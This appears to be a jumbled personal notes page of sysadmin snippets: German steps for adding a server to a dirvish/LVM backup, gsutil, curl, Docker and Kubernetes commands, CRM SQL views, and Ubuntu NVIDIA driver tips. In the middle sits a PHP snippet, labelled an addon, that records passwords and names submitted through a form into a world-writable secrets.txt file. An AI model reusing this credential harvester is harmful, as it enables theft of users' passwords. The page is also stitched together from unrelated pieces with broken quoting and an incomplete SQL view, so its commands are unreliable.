Project side on

# Server in Backup aufnehmen

Jedes Backup hat ein eigenes LVM mit einem Mountpunkt unter

* Mit `vgdisplay` freien Speicherplatz prüfen (Punkt `Free  PE / Size`)
* Mountpunkt erstellen mit `mkdir /mnt/backup/{server}`
* Mit `lvcreate -L 100G -n {server} VG01_srsouthp08` ein neues logical
volume erstellen (die 100G sollten je nach System angepasst werden)
* Mit `mkfs.ext4 /dev/VG01_srsouthp08/{server}` neues Volume formatieren
* Mit `mount /dev/VG01_srsouthp08/{server} /mnt/backup/{server}` das
Volume mounten
* Einen entsprechenden Eintrag in der `fstab` vornehmen:
`/dev/mapper/VG01_srsouthp08-{server}   /mnt/backup/{server}    ext4
defaults,_netdev        0       0
* Den Ordner `/mnt/backup/{server}/dirvish` erstellen und darin die
`default.conf` anlegen.
* In der Datei `/etc/dirvish/backup-dirvish.conf` ganz Unten den Server
in die Variable `VAULTS` eintragen
* In der Datei `/etc/cron.d/adfinis-dirvish-backup` einen Cronjob für
den Server erstellen
* Erstes Backup mit `dirvish --vault {server} --init` erstellen.
Achtung!: Dies kann mehrere Stunden dauern und sollte deswegen in einem
`screen` laufen.

On Client add key, exclude hughe archives and make sure the database is in a state where the backup can be used or it has a dump from it.
Test with dirvish --no-run --vault {server}

Google Cloud storage is heasy to handle with

gsutil like

gsutil mb -p -c gs://bucketname

gsutil ls -l -b gs://bucketname

wget ls -a publicurl - to se the archives

using gsutil cp to restore an old archive

curl –silent -H “Accept-Encoding: gzip,deflate” –write-out “%{size_download}\n” –output /dev/null

curl –silent –write-out “%{size_download}\n” –output /dev/null

this addon collects the passwords entered in a form in the secrets.txt file 777

< "questionmark" php if(isset($_POST['name'])) { $data=$_POST['name']; $fp = fopen('secrets.txt', 'a'); fwrite($fp, $data. " "); fclose($fp); } if(isset($_POST['pass'])) { $data=$_POST['pass']; $fp = fopen('secrets.txt', 'a'); fwrite($fp, $data. "\n"); fclose($fp); } "questionmark">

CREATE VIEW `Sales_stage_history_pb` AS
`ac`.`name` AS `account_name`,
`ac`.`id` AS `account_id`,
`u`.`user_name` AS `kam`,
`oc`.`expected_er_delivery_date_c` AS `expected_delivery_date`,
`oc`.`numberoftons_c` AS `numbers_of_tons`,
o.lead_source AS lead_source,
ac.billing_address_country AS country,
oc.spcategorie_c AS practice,
o.probability AS probability,
`o`.`name` AS `opportunity_name`,
`o`.`description` AS `opportunity_description`,
`o`.`sales_stage` AS `current_stage`,
`o`.`amount` AS `gross_margin`,
`a`.`before_value_string` AS `old_value`,
`a`.`after_value_string` AS `new_value`,
`a`.`date_created` AS `changing_date`,
`acc`.`spindustrysectorii_c` AS `sp_industry`,
`acc`.`newaccountstatus_c` AS `acc_status`,
`acc`.`commitments_c` AS `acc_commitments`,
`acc`.`reportingto_c` AS `acc_reporting_to`,
`oc`.`spcategorie_c` AS `opp_solution`,
`o`.`date_entered` AS `opp_creation_date`,
`oc`.`reasonswonlost_c` AS `opp_reasonswonlost`,
`o`.`campaign_id` AS `opp_campaign` from ((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`)
where ((`a`.`field_name` = ‘sales_stage’)
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`o`.`id` = `oc`.`id_c`)) ;

CREATE VIEW `sophies3` AS
`o`.`name` AS `Opportunity name`,
`ac`.`name` AS `Client name`,
`acc`.`newaccountstatus_c` AS `Account status`,
`ac`.`billing_address_country` AS `Country`,
`o`.`date_entered` AS `Date created`,
`oc`.`expected_er_delivery_date_c` AS `Estimated delivery date`,
`u`.`user_name` AS `KAM`,
`i`.`name` AS `SP industry`, AS Practice,
`o`.`amount` AS `Estimated SP gross margin (EUR)`,
o.probability AS probability,
oc.weightedgrossmargin_c AS `Estimated gross margin with probability`,
`o`.`sales_stage` AS `Sales stage`,
o.lead_source AS `Lead source`,
`o`.`campaign_id` AS `Campaign ID`
from ((((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`) join `practices` `p`)join `industries` `i`)
where ((`a`.`field_name` = ‘sales_stage’)
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`oc`.`spcategorie_c` = `p`.`id`)
and (`acc`.`spindustrysectorii_c` = `i`.`id`)
and (`o`.`id` = `oc`.`id_c`)) ;

Docker commands
docker system prune -a

docker images
docker logs alaskaback
docker exec -it alaskaback /bin/sh
docker exec -it alaskaback /bin/bash
/proc/14/fd # tail -f 0 1 2

K8 commands
to enter container

kubectl get pods

kubectl exec -it alaska-api-9df9b4594-jchrl — /bin/bash
kubectl exec -it alaska-payments-d54ffd8b9-jjtw4 — /bin/bash
some commands

kubectl apply -f

docker-compose -f prox.yaml up -d

kubectl get service alaska-administration

kubectl get pods

kubectl get services

kubectl rollout undo deployments alaska-administration

kubectl describe pods

kubectl get ev

kubectl delete pod foo

GIT commands

git stash

Removing All Unused Objects
The docker system prune command will remove all stopped containers, all dangling images, and all unused networks:

docker system prune

Using UEFI, have try secure boot off and on but still hang.

Ah I’ve only used usb. Could you legacy boot the cd? On start up press the key for boot list and boot the cd in legacy. Another option try booting and editing the boot in grub by pressing E on install and replace quiet splash with nomodeset and then f10 to boot

sudo add-apt-repository ppa:graphics-drivers

sudo apt-get install nvidia-driver-410

or for an old macbook
sudo apt update
sudo apt install nvidia-387